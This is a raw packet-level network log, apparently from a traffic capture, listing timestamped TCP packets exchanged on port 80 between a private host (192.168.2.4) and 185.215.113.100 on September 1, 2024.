Sep 1, 2024 23:03:14.669692993 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:14.669703960 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:14.669728041 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:14.669748068 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:14.752860069 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:14.752871990 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:14.752916098 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:14.869874001 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:14.869884968 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:14.870028973 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:15.136236906 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:15.136255980 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:15.136267900 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:15.136277914 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:15.136307955 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:15.136394024 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:15.136394978 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:15.136394978 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:15.136565924 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:15.136606932 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:15.338023901 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:15.338044882 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:15.338056087 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:15.338109016 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:15.338146925 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:15.754367113 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:15.754380941 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:15.754391909 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:15.754456043 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:15.754466057 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:15.754558086 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:15.754558086 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:15.754558086 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:15.963948965 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:15.963993073 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:15.964021921 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:15.964036942 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:16.051258087 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:16.051326036 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:16.051414013 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:16.051455021 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:16.158406019 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:16.158415079 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:16.158566952 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:16.158566952 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:16.158621073 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:16.158634901 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:16.158648014 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:16.158680916 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:16.625720024 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:16.625741005 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:16.625902891 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:16.625902891 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:16.835663080 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:16.835695028 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:16.835707903 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:16.835736036 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:16.835752010 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:16.835758924 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:16.835793018 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:17.034208059 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.034245014 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.034255028 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.034288883 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:17.034332037 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:17.234251022 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.234261036 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.234271049 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.234277010 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.234282017 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.234332085 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:17.234364986 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:17.442413092 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.442446947 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.442457914 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.442497969 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.442511082 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:17.442533016 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:17.442578077 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:17.526576042 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.526587009 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.526640892 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:17.823659897 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.823709011 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.823719025 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.823837042 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:17.823862076 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.823870897 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.823883057 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.823894978 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.823900938 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:17.823904037 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.823944092 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:17.858813047 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.858871937 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.858882904 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.858891964 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:17.858930111 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:17.858967066 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.859006882 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.859014034 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:17.859019041 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:17.859045982 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:17.859060049 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:18.099315882 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:18.099386930 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:18.099400997 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:18.099406958 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:18.099426031 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:18.099427938 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:18.099453926 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:18.099464893 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:18.099625111 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:18.099637032 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:18.099679947 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:18.341880083 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:18.342041969 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:18.342051983 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:18.342061996 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:18.342119932 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:18.342156887 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:18.342403889 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:18.342448950 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:18.342463970 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:18.342474937 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:18.342516899 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:18.342541933 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:18.342587948 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:18.852227926 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:18.852288008 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:18.852359056 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:18.852396965 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:19.032704115 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:19.032866955 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:19.033086061 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:19.033139944 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:20.544226885 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:20.544243097 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:20.544507027 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:20.968158960 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:20.968174934 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:20.968209982 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:20.968220949 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:20.968266010 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:20.968287945 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:20.968287945 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:20.968352079 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:20.968641043 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:20.968703032 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:21.181174994 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.181221008 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.181231976 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.181355000 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.181360006 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:21.181360960 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:21.181401014 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:21.181426048 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.181477070 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:21.181576014 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.181619883 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:21.181624889 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.181636095 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.181669950 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:21.770086050 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.770102978 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.770129919 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.770139933 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.770152092 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.770172119 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.770265102 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.770275116 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.770276070 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:21.770276070 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:21.770318031 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:21.796528101 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.796538115 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.796600103 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:21.847824097 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.847868919 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:21.848026991 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.848067045 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:21.848184109 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:21.848221064 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.053055048 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.053066015 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.053129911 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.053153992 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.053163052 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.053225994 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.053225994 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.053225994 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.053225994 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.053225994 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.136502981 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.136511087 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.136658907 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.136658907 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.249614954 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.249627113 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.249638081 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.249648094 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.249799967 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.249799967 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.332089901 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.332107067 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.332284927 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.332284927 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.468209982 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.468238115 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.468249083 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.468346119 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.468362093 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.468406916 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.468406916 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.468406916 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.468406916 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.658696890 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.658725023 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.658736944 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.658792973 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.658817053 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.658824921 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.658859015 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.659027100 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.659037113 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.659081936 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.864694118 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.864706993 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.864723921 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.864784002 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.864830971 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.864839077 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.865012884 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.865022898 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:22.865055084 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:22.865078926 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:23.702019930 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:23.702090979 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:23.702091932 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:23.702106953 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:23.702136993 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:23.702158928 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:23.702181101 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:23.702195883 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:23.702238083 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:23.702411890 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:23.702461004 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:23.702615023 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:23.702651978 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:23.702662945 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:23.702662945 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:23.702691078 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:23.702723026 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:23.908139944 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:23.908169031 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:23.908179998 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:23.908200979 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:23.908219099 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:23.908247948 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:23.908281088 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:24.236232042 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.236300945 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:24.236356974 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.236366034 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.236377001 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.236407995 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:24.236428022 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:24.236520052 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.236563921 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:24.332679033 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.332700968 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.332710981 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.332882881 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:24.332882881 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:24.415494919 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.415503979 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.415559053 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:24.415582895 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:24.531912088 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.531946898 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.531992912 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.532042027 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.532176971 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:24.532176971 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:24.614602089 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.614613056 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.614662886 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:24.746510029 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.746534109 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.746578932 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:24.746597052 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:24.746618986 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.746643066 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.746659994 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:24.746684074 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:24.843229055 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.843297958 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:24.843323946 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.843493938 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:24.946773052 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.946978092 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.946986914 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.946995974 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:24.947020054 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:24.947262049 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:25.094114065 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:25.094134092 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:25.094145060 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:25.094222069 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:25.094244003 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:25.166733980 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:25.166743994 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:25.166753054 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:25.166802883 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:26.815164089 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:26.815176964 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:26.815220118 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:26.815256119 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:27.217010021 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:27.217025995 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:27.217036963 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:27.217077971 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:27.217120886 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:27.217139959 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:27.217150927 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:27.217186928 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:27.300247908 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:27.300283909 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:27.300303936 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:27.300329924 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:27.621686935 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:27.621704102 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:27.621709108 CEST	80	49730	185.215.113.100	192.168.2.4
